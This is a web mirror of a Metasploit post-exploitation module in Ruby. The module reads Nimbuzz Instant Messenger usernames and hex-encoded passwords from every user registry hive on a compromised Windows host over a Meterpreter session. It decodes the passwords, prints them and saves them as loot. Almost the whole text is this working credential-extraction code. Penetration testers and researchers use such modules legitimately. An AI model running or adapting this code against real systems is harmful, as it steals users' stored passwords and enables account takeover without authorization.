CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/gather/credentials/nimbuzz.rb
Views: 11704
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::Windows::Registry

8
  include Msf::Auxiliary::Report

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'Windows Gather Nimbuzz Instant Messenger Password Extractor',

15
        'Description' => %q{

16
          This module extracts the account passwords saved by Nimbuzz Instant

17
          Messenger in hex format.

18
        },

19
        'License' => MSF_LICENSE,

20
        'Author' => [

21
          'sil3ntdre4m <sil3ntdre4m[at]gmail.com>',

22
          'Unknown', # SecurityXploded Team, www.SecurityXploded.com

23
        ],

24
        'Platform' => [ 'win' ],

25
        'SessionTypes' => [ 'meterpreter' ]

26
      )

27
    )

28
  end

29


30
  def run

31
    creds = Rex::Text::Table.new(

32
      'Header' => 'Nimbuzz Instant Messenger Credentials',

33
      'Indent' => 1,

34
      'Columns' =>

35
      [

36
        'User',

37
        'Password'

38
      ]

39
    )

40


41
    registry_enumkeys('HKU').each do |k|

42
      next unless k.include? 'S-1-5-21'

43
      next if k.include? '_Classes'

44


45
      vprint_status("Looking at Key #{k}")

46
      subkeys = registry_enumkeys("HKU\\#{k}\\Software\\Nimbuzz\\")

47


48
      if subkeys.nil? || (subkeys == '')

49
        print_status('Nimbuzz Instant Messenger not installed for this user.')

50
        return

51
      end

52


53
      user = registry_getvaldata("HKU\\#{k}\\Software\\Nimbuzz\\PCClient\\Application\\", 'Username') || ''

54
      hpass = registry_getvaldata("HKU\\#{k}\\Software\\Nimbuzz\\PCClient\\Application\\", 'Password')

55


56
      next if hpass.nil? || (hpass == '')

57


58
      hpass =~ /.{11}(.*)./

59
      decpass = [::Regexp.last_match(1)].pack('H*')

60
      print_good("User=#{user}, Password=#{decpass}")

61
      creds << [user, decpass]

62
    end

63


64
    print_status('Storing data...')

65
    path = store_loot(

66
      'nimbuzz.user.creds',

67
      'text/csv',

68
      session,

69
      creds.to_csv,

70
      'nimbuzz_user_creds.csv',

71
      'Nimbuzz User Credentials'

72
    )

73
    print_good("Nimbuzz user credentials saved in: #{path}")

74
  end

75
end

76


77